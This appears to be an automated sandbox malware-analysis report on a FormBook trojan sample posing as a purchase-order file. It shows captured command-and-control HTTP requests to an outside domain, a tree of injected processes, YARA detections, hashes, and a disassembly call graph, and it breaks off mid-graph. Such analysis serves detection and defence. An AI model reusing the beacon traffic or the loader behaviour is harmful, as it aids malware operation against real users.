                      Data Ascii: chHT=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vV/TUp+ej+bTA7WoFbHtB/6bb7zrCL5h0/bq2SMjRvwAOqLubwG0Cz+uUu4X0IyTbM/itdLwdXzlxFZB2RYSHzccyvRW+uL6QtyRmNeUe4tINTX1xXppCm25SY+w4oTgOj+y95FiNUbpqt9kJik/rTa8uJp5d3m5BWqmqrq141Yoo6VmioIPsoNCuaEFwFj1B1nAWL/mGPiAYcn7avZ2NjlFVq/eVDlUEdFIel+/UpSDFM47Vxe2V4K9XRHC9F4o+d/JvaXhR90uJ8lfiBkdmPMFBXl0P4rJGV4vyiSSJB2pHTTBL3QqOF9QcKzPe9KF/mS4E9Z5RX0IKjxiOvUU05+RNfwe55nWZL8qWmbBvstdTO4Rmz6N52DxXq4M13uGy//YM5Z695UkYKi43jeNRzhCOmZ3GEthbuqaG1ATVD1cI33aBj4A93h209KLRkeug8OKxC8UXpy+Hwl/rJIB1OXoTrzHyoqagXAdg7CWIQF6FF5TTMep7lNHtUhmnH/4vy8F9ErbeRuGBj7UkilND6JloPw3xzgc9gYwsIp/wl2ERA37Jk1PSDDh0RUD6+iLeGL2a5CzfxdnYO7m1wgn7S4IIQOn2CgCnD8aZPWu1RawdLpuz6b3Bw/9WAe+snpP7Enev5Wcu8p5lzOTthfx1IB3xLcGCks8irbJtlteDHWqzfTTNCHDt5E1LDTPXxCQgDyNLKOc44zSxqp9QC7dsG+qc3OKbM7Lf3cc0LZ/53WQzaYpbUy3IOfWGrYnB/rtA0C1vOpLmMlm7sEP0a2Zi54qXYjEfEaXfqgQcU6IBEEyCIJ/7ceqxuVM3CdJSuheSJqKy4yG9hxngwM+mwQzk0m43/T5IZZ9yk311Mvi0EjejoRgxOzQxtMMOvrWqbkwtHFcfKuZelT/IijpYQlx0ZlwqeNgAxMYeWUuZkRZvQrxw/T6v2yZ+C6wYN6idA3D4OFfHQ [TRUNCATED]
                      Sep 10, 2024 08:50:36.650837898 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:36 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.44977343.242.202.169801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:38.113784075 CEST459OUTGET /ed2j/?chHT=HnYP2yoU4dt40olvIDuXD48kL/PNXzgkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjaKCOmMM/uBzrxUijYkdqZPZsj8JBjY2qkwg=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.mizuquan.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:50:38.979907036 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:50:38 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:02:47:35
                      Start date:10/09/2024
                      Path:C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
                      Imagebase:0x2b0000
                      File size:1'220'608 bytes
                      MD5 hash:C029364519D917E71EC6E8BE9301755B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:02:47:36
                      Start date:10/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
                      Imagebase:0xb50000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:02:47:46
                      Start date:10/09/2024
                      Path:C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe"
                      Imagebase:0x4e0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:3
                      Start time:02:47:47
                      Start date:10/09/2024
                      Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                      Imagebase:0x310000
                      File size:478'720 bytes
                      MD5 hash:6599A09C160036131E4A933168DA245F
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:7
                      Start time:02:48:01
                      Start date:10/09/2024
                      Path:C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe"
                      Imagebase:0x4e0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:8
                      Start time:02:48:17
                      Start date:10/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.1%
                        Dynamic/Decrypted Code Coverage:1.1%
                        Signature Coverage:8.5%
                        Total number of Nodes:1642
                        Total number of Limit Nodes:145
                        execution_graph 102806 32a0a7 102810 2faf66 102806->102810 102808 32a0b2 102809 2faf66 84 API calls 102808->102809 102809->102808 102815 2faf73 102810->102815 102820 2fafa0 102810->102820 102811 2fafa2 102851 2cf833 81 API calls 102811->102851 102813 2fafa7 102821 2b84a6 102813->102821 102815->102811 102815->102813 102818 2faf9a 102815->102818 102815->102820 102816 2fafae 102841 2b7b4b 102816->102841 102850 2c4265 61 API calls _memmove 102818->102850 102820->102808 102822 2b84be 102821->102822 102839 2b84ba 102821->102839 102823 2b84ea __itow Mailbox _wcscpy 102822->102823 102824 325592 __i64tow 102822->102824 102825 325494 102822->102825 102826 2b84d2 102822->102826 102853 2d010a 102823->102853 102827 32557a 102825->102827 102828 32549d 102825->102828 102852 2d234b 80 API calls 3 library calls 102826->102852 102866 2d234b 80 API calls 3 library calls 102827->102866 102828->102823 102833 3254bc 102828->102833 102832 2b84f4 102832->102839 102862 2bcaee 102832->102862 102834 2d010a 48 API calls 102833->102834 102836 3254d9 102834->102836 102837 2d010a 48 API calls 102836->102837 102838 3254ff 102837->102838 102838->102839 102840 2bcaee 48 API calls 102838->102840 102839->102816 102840->102839 102842 2b7b5d 102841->102842 102843 32240d 102841->102843 102889 2bbbd9 102842->102889 102895 2ec0a2 48 API calls _memmove 102843->102895 102846 2b7b69 102846->102820 102847 322417 102896 2bc935 48 API calls 102847->102896 102849 32241f Mailbox 102850->102820 102851->102813 102852->102823 102856 2d0112 __calloc_impl 102853->102856 102855 2d012c 102855->102832 102856->102855 102857 2d012e std::exception::exception 102856->102857 102867 2d45ec 102856->102867 102881 2d7495 RaiseException 102857->102881 102859 2d0158 102882 2d73cb 47 API calls _free 102859->102882 102861 2d016a 102861->102832 102863 2bcafd __wsetenvp _memmove 102862->102863 102864 2d010a 48 API calls 102863->102864 102865 2bcb3b 102864->102865 102865->102839 102866->102823 102868 2d4667 __calloc_impl 102867->102868 102878 2d45f8 __calloc_impl 102867->102878 102888 2d889e 47 API calls __getptd_noexit 102868->102888 102869 2d4603 102869->102878 102883 2d8e52 47 API calls 2 library calls 102869->102883 102884 2d8eb2 47 API calls 8 library calls 102869->102884 102885 2d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102869->102885 102872 2d462b RtlAllocateHeap 102874 2d465f 102872->102874 102872->102878 102874->102856 102875 2d4653 102886 2d889e 47 API calls __getptd_noexit 102875->102886 102878->102869 102878->102872 102878->102875 102879 2d4651 102878->102879 102887 2d889e 47 API calls __getptd_noexit 102879->102887 102881->102859 102882->102861 102883->102869 102884->102869 102886->102879 102887->102874 102888->102874 102890 2bbbe7 102889->102890 102891 2bbc0d _memmove 102889->102891 102890->102891 102892 2d010a 48 API calls 102890->102892 102891->102846 102891->102891 102893 2bbc5c 102892->102893 102894 2d010a 48 API calls 102893->102894 102894->102891 102895->102847 102896->102849 102897 321eca 102902 2cbe17 102897->102902 102901 321ed9 102910 2bd3d2 102902->102910 102906 2cbf22 102907 2cbf3e 102906->102907 102918 2cc8b7 48 API calls _memmove 102906->102918 102909 2d1b2a 52 API calls __cinit 102907->102909 102909->102901 102911 2d010a 48 API calls 102910->102911 102912 2bd3f3 102911->102912 102913 2d010a 48 API calls 102912->102913 102914 2bd401 102913->102914 102915 2cc929 102914->102915 102919 2cc955 102915->102919 102918->102906 102920 2cc948 102919->102920 102921 2cc962 102919->102921 102920->102906 102921->102920 102922 2cc969 RegOpenKeyExW 102921->102922 102922->102920 102923 2cc983 RegQueryValueExW 102922->102923 102924 2cc9b9 RegCloseKey 102923->102924 102925 2cc9a4 102923->102925 102924->102920 102925->102924 102926 321e8b 102931 2ce44f 102926->102931 102930 321e9a 102932 2d010a 48 API calls 102931->102932 102933 2ce457 102932->102933 102934 2ce46b 102933->102934 102939 2ce74b 102933->102939 102938 2d1b2a 52 API calls __cinit 102934->102938 102938->102930 102940 2ce754 102939->102940 102941 2ce463 102939->102941 102971 2d1b2a 52 API calls __cinit 102940->102971 102943 2ce47b 102941->102943 102944 2bd3d2 48 API calls 102943->102944 102945 2ce492 GetVersionExW 102944->102945 102972 2b7e53 102945->102972 102947 2ce4d5 102981 2ce5f8 102947->102981 102951 3229f9 102955 2ce55f GetCurrentProcess 102998 2ce70e LoadLibraryA GetProcAddress 102955->102998 102956 2ce576 102958 2ce5ec GetSystemInfo 102956->102958 102959 2ce59e 102956->102959 102961 2ce5c9 102958->102961 102992 2ce694 102959->102992 102963 2ce5dc 102961->102963 102964 2ce5d7 FreeLibrary 102961->102964 102963->102934 102964->102963 102965 2ce5e4 GetSystemInfo 102968 2ce5be 102965->102968 102966 2ce5b4 102995 2ce437 102966->102995 102968->102961 102970 2ce5c4 FreeLibrary 102968->102970 102970->102961 102971->102941 102973 2b7ecf 102972->102973 102975 2b7e5f __wsetenvp 102972->102975 103003 2ba2fb 102973->103003 102976 2b7e7b 102975->102976 102977 2b7ec7 102975->102977 102999 2ba6f8 102976->102999 103002 2b7eda 48 API calls 102977->103002 102980 2b7e85 _memmove 102980->102947 102982 2ce601 102981->102982 102983 2ba2fb 48 API calls 102982->102983 102984 2ce4dd 102983->102984 102985 2ce617 102984->102985 102986 2ce625 102985->102986 102987 2ba2fb 48 API calls 102986->102987 102988 2ce4e9 102987->102988 102988->102951 102989 2ce6d1 102988->102989 103011 2ce6e3 102989->103011 103015 2ce6a6 102992->103015 102996 2ce694 2 API calls 102995->102996 102997 2ce43f GetNativeSystemInfo 102996->102997 102997->102968 102998->102956 103000 2d010a 48 API calls 102999->103000 103001 2ba702 103000->103001 103001->102980 103002->102980 103004 2ba309 103003->103004 103006 2ba321 _memmove 103003->103006 103004->103006 103007 2bb8a7 103004->103007 103006->102980 103008 2bb8ba 103007->103008 103010 2bb8b7 _memmove 103007->103010 103009 2d010a 48 API calls 103008->103009 103009->103010 103010->103006 103012 2ce55b 103011->103012 103013 2ce6ec LoadLibraryA 103011->103013 103012->102955 103012->102956 103013->103012 103014 2ce6fd GetProcAddress 103013->103014 103014->103012 103016 2ce5ac 103015->103016 103017 2ce6af LoadLibraryA 103015->103017 103016->102965 103016->102966 103017->103016 103018 2ce6c0 GetProcAddress 103017->103018 103018->103016 103019 321edb 103024 2b131c 103019->103024 103021 321ee1 103057 2d1b2a 52 API calls __cinit 103021->103057 103023 321eeb 103025 2b133e 103024->103025 103058 2b1624 103025->103058 103030 2bd3d2 48 API calls 103031 2b137e 103030->103031 103032 2bd3d2 48 API calls 103031->103032 103033 2b1388 103032->103033 103034 2bd3d2 48 API calls 103033->103034 103035 2b1392 103034->103035 103036 2bd3d2 48 API calls 103035->103036 103037 2b13d8 103036->103037 103038 2bd3d2 48 API calls 103037->103038 103039 2b14bb 103038->103039 103066 2b1673 103039->103066 103043 2b14eb 103044 2bd3d2 48 API calls 103043->103044 103045 2b14f5 103044->103045 103095 2b175e 103045->103095 103047 2b1540 103048 2b1550 GetStdHandle 103047->103048 103049 2b15ab 103048->103049 103050 3258da 103048->103050 103051 2b15b1 CoInitialize 103049->103051 103050->103049 103052 3258e3 103050->103052 103051->103021 103102 2f9bd1 53 API calls 103052->103102 103054 3258ea 103103 2fa2f6 CreateThread 103054->103103 103056 3258f6 CloseHandle 103056->103051 103057->103023 103104 2b17e0 103058->103104 103061 2b7e53 48 API calls 103062 2b1344 103061->103062 103063 2b16db 103062->103063 103118 2b1867 6 API calls 103063->103118 103065 2b1374 103065->103030 103067 2bd3d2 48 API calls 103066->103067 103068 2b1683 103067->103068 103069 2bd3d2 48 API calls 103068->103069 103070 2b168b 103069->103070 103119 2b7d70 103070->103119 103073 2b7d70 48 API calls 103074 2b169b 103073->103074 103075 2bd3d2 48 API calls 103074->103075 103076 2b16a6 103075->103076 103077 2d010a 48 API calls 103076->103077 103078 2b14c5 103077->103078 103079 2b16f2 103078->103079 103080 2b1700 103079->103080 103081 2bd3d2 48 API calls 103080->103081 103082 2b170b 103081->103082 103083 2bd3d2 48 API calls 103082->103083 103084 2b1716 103083->103084 103085 2bd3d2 48 API calls 103084->103085 103086 2b1721 103085->103086 103087 2bd3d2 48 API calls 103086->103087 103088 2b172c 103087->103088 103089 2b7d70 48 API calls 103088->103089 103090 2b1737 103089->103090 103091 2d010a 48 API calls 103090->103091 103092 2b173e 103091->103092 103093 3224a6 103092->103093 103094 2b1747 RegisterWindowMessageW 103092->103094 103094->103043 103096 2b176e 103095->103096 103097 3267dd 103095->103097 103099 2d010a 48 API calls 103096->103099 103124 2fd231 50 API calls 103097->103124 103101 2b1776 103099->103101 103100 3267e8 103101->103047 103102->103054 103103->103056 103125 2fa2dc 54 API calls 103103->103125 103111 2b17fc 103104->103111 103107 2b17fc 48 API calls 103108 2b17f0 103107->103108 103109 2bd3d2 48 API calls 103108->103109 103110 2b165b 103109->103110 103110->103061 103112 2bd3d2 48 API calls 103111->103112 103113 2b1807 103112->103113 103114 2bd3d2 48 API calls 103113->103114 103115 2b180f 103114->103115 103116 2bd3d2 48 API calls 103115->103116 103117 2b17e8 103116->103117 103117->103107 103118->103065 103120 2bd3d2 48 API calls 103119->103120 103121 2b7d79 103120->103121 103122 2bd3d2 48 API calls 103121->103122 103123 2b1693 103122->103123 103123->103073 103124->103100 103126 2b29c2 103127 2b29cb 103126->103127 103128 2b29e9 103127->103128 103129 2b2a48 103127->103129 103165 2b2a46 103127->103165 103130 2b2aac PostQuitMessage 103128->103130 103131 2b29f6 103128->103131 103133 322307 103129->103133 103134 2b2a4e 103129->103134 103168 2b2a39 103130->103168 103136 2b2a01 103131->103136 103137 32238f 103131->103137 103132 2b2a2b DefWindowProcW 103132->103168 103175 2b322e 16 API calls 103133->103175 103138 2b2a53 103134->103138 103139 2b2a76 SetTimer RegisterWindowMessageW 103134->103139 103141 2b2a09 103136->103141 103142 2b2ab6 103136->103142 103190 2f57fb 60 API calls _memset 103137->103190 103145 2b2a5a KillTimer 103138->103145 103146 3222aa 103138->103146 103143 2b2a9f CreatePopupMenu 103139->103143 103139->103168 103140 32232e 103176 2cec33 346 API calls Mailbox 103140->103176 103149 322374 103141->103149 103150 2b2a14 103141->103150 103173 2b1e58 53 API calls _memset 103142->103173 103143->103168 103171 2b2b94 Shell_NotifyIconW _memset 103145->103171 103153 3222e3 MoveWindow 103146->103153 103154 3222af 103146->103154 103149->103132 103189 2eb31f 48 API calls 103149->103189 103156 32235f 103150->103156 103161 2b2a1f 103150->103161 103151 3223a1 103151->103132 103151->103168 103153->103168 103157 3222d2 SetFocus 103154->103157 103158 3222b3 103154->103158 103155 2b2a6d 103172 2b2ac7 DeleteObject DestroyWindow Mailbox 103155->103172 103188 2f5fdb 70 API calls _memset 103156->103188 103157->103168 103158->103161 103162 3222bc 103158->103162 103161->103132 103177 2b2b94 Shell_NotifyIconW _memset 103161->103177 103174 2b322e 16 API calls 103162->103174 103164 2b2ac5 103164->103168 103165->103132 103169 322353 103178 2b3598 103169->103178 103171->103155 103172->103168 103173->103164 103174->103168 103175->103140 103176->103161 103177->103169 103179 2b35c3 _memset 103178->103179 103191 2b38c4 103179->103191 103183 3245c2 Shell_NotifyIconW 103184 2b3666 Shell_NotifyIconW 103195 2b38e4 103184->103195 103186 2b367b 103186->103165 103187 2b3648 103187->103183 103187->103184 103188->103164 103189->103165 103190->103151 103192 3244d1 103191->103192 103193 2b3618 103191->103193 103192->103193 103194 3244da DestroyIcon 103192->103194 103193->103187 103217 2f6237 61 API calls _W_store_winword 103193->103217 103194->103193 103196 2b3900 103195->103196 103216 2b39d5 Mailbox 103195->103216 103218 2b7b6e 103196->103218 103199 2b391b 103201 2b7e53 48 API calls 103199->103201 103200 32453f LoadStringW 103203 324559 103200->103203 103202 2b3930 103201->103202 103202->103203 103204 2b3941 103202->103204 103225 2b39e8 48 API calls 2 library calls 103203->103225 103206 2b394b 103204->103206 103207 2b39da 103204->103207 103223 2b39e8 48 API calls 2 library calls 103206->103223 103224 2bc935 48 API calls 103207->103224 103210 324564 103211 324578 103210->103211 103214 2b3956 _memset _wcscpy 103210->103214 103226 2b39e8 48 API calls 2 library calls 103211->103226 103213 324586 103215 2b39ba Shell_NotifyIconW 103214->103215 103215->103216 103216->103186 103217->103187 103219 2d010a 48 API calls 103218->103219 103220 2b7b93 103219->103220 103221 2ba6f8 48 API calls 103220->103221 103222 2b390e 103221->103222 103222->103199 103222->103200 103223->103214 103224->103214 103225->103210 103226->103213 103227 3bc23b0 103241 3bc0000 103227->103241 103229 3bc2467 103244 3bc22a0 103229->103244 103231 3bc2490 CreateFileW 103233 3bc24df 103231->103233 103234 3bc24e4 103231->103234 103234->103233 103235 3bc24fb VirtualAlloc 103234->103235 103235->103233 103236 3bc2519 ReadFile 103235->103236 103236->103233 103237 3bc2534 103236->103237 103238 3bc12a0 13 API calls 103237->103238 103239 3bc2567 103238->103239 103240 3bc258a ExitProcess 103239->103240 103240->103233 103247 3bc3490 GetPEB 103241->103247 103243 3bc068b 103243->103229 103245 3bc22a9 Sleep 103244->103245 103246 3bc22b7 103245->103246 103248 3bc34ba 103247->103248 103248->103243 103249 2d6a80 103250 2d6a8c __mtinitlocknum 103249->103250 103286 2d8b7b GetStartupInfoW 103250->103286 103252 2d6a91 103288 2da937 GetProcessHeap 103252->103288 103254 2d6ae9 103255 2d6af4 103254->103255 103373 2d6bd0 47 API calls 3 library calls 103254->103373 103289 2d87d7 103255->103289 103258 2d6afa 103259 2d6b05 __RTC_Initialize 103258->103259 103374 2d6bd0 47 API calls 3 library calls 103258->103374 103310 2dba66 103259->103310 103262 2d6b14 103263 2d6b20 GetCommandLineW 103262->103263 103375 2d6bd0 47 API calls 3 library calls 103262->103375 103329 2e3c2d GetEnvironmentStringsW 103263->103329 103267 2d6b1f 103267->103263 103270 2d6b45 103342 2e3a64 103270->103342 103273 2d6b4b 103274 2d6b56 103273->103274 103377 2d1d7b 47 API calls 3 library calls 103273->103377 103356 2d1db5 103274->103356 103277 2d6b5e 103278 2d6b69 __wwincmdln 103277->103278 103378 2d1d7b 47 API calls 3 library calls 103277->103378 103360 2b3682 103278->103360 103281 2d6b7d 103282 2d6b8c 103281->103282 103379 2d2011 47 API calls _doexit 103281->103379 103380 2d1da6 47 API calls _doexit 103282->103380 103285 2d6b91 __mtinitlocknum 103287 2d8b91 103286->103287 103287->103252 103288->103254 103381 2d1e5a 30 API calls 2 library calls 103289->103381 103291 2d87dc 103382 2d8ab3 InitializeCriticalSectionAndSpinCount 103291->103382 103293 2d87e1 103294 2d87e5 103293->103294 103384 2d8afd TlsAlloc 103293->103384 103383 2d884d 50 API calls 2 library calls 103294->103383 103297 2d87ea 103297->103258 103298 2d87f7 103298->103294 103299 2d8802 103298->103299 103385 2d7616 103299->103385 103302 2d8844 103393 2d884d 50 API calls 2 library calls 103302->103393 103305 2d8823 103305->103302 103307 2d8829 103305->103307 103306 2d8849 103306->103258 103392 2d8724 47 API calls 4 library calls 103307->103392 103309 2d8831 GetCurrentThreadId 103309->103258 103311 2dba72 __mtinitlocknum 103310->103311 103402 2d8984 103311->103402 103313 2dba79 103314 2d7616 __calloc_crt 47 API calls 103313->103314 103316 2dba8a 103314->103316 103315 2dbaf5 GetStartupInfoW 103324 2dbc33 103315->103324 103326 2dbb0a 103315->103326 103316->103315 103317 2dba95 __mtinitlocknum @_EH4_CallFilterFunc@8 103316->103317 103317->103262 103318 2dbcf7 103409 2dbd0b LeaveCriticalSection _doexit 103318->103409 103320 2dbc7c GetStdHandle 103320->103324 103321 2d7616 __calloc_crt 47 API calls 103321->103326 103322 2dbc8e GetFileType 103322->103324 103323 2dbb58 103323->103324 103327 2dbb98 InitializeCriticalSectionAndSpinCount 103323->103327 103328 2dbb8a GetFileType 103323->103328 103324->103318 103324->103320 103324->103322 103325 2dbcbb 